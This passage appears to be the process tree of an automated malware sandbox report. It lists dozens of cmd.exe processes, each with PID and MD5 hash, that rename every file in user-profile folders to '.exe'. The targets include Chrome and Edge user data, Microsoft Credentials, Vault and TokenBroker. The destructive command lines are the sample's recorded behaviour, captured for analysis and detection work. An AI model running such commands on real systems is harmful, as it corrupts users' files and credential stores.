          • cmd.exe (PID: 5760 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\CertificateRevocation\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 6540 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6364 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crowd Deny\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5676 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1772 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\FileTypePolicies\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7964 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\FirstPartySetsPreloaded\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 5616 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\GraphiteDawnCache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 3688 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\GrShaderCache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7776 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\hyphen-data\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5052 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\MediaFoundationWidevineCdm\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 4288 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\MEIPreload\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 2884 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\OnDeviceHeadSuggestModel\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3168 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\OptimizationHints\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 5628 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\OriginTrials\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7708 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\PKIMetadata\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7244 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\pnacl\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7524 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\RecoveryImproved\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 2684 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Safe Browsing\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6008 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SafetyTips\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 720 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ShaderCache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 1272 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SSLErrorAssistant\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2584 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Subresource Filter\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 1480 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ThirdPartyModuleList64\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2020 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\TrustTokenKeyCommitments\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3436 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\WidevineCdm\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 4808 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4720 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\History.IE5\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6680 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\Low\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4980 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\History.IE5\MSHist012023100420231005\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5000 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\Low\History.IE5\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 1356 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v2.0_32\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 6048 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6120 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0_32\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2888 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Credentials\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7556 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5392 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6036 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3716 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\FontCache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 5788 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\GameDVR\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5588 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 8152 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4820 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4996 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Media Player\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1016 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7224 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5684 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\PenWorkspace\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7728 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\PlayReady\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7456 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\RMSLocalStorage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7344 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\TokenBroker\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6752 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Vault\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7384 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5572 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7860 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\WindowsApps\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3976 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v2.0_32\UsageLogs\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 8144 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\UsageLogs\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7948 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0_32\UsageLogs\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 2352 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 6064 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\FontCache\4\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 6620 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\FontCache\4\Catalog\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5368 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\FontCache\4\CloudFonts\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7524 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\FontCache\4\PreviewFont\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 2504 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\af-ZA\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4768 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\ar-AE\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1788 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\ar-BH\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3624 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\ar-DZ\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
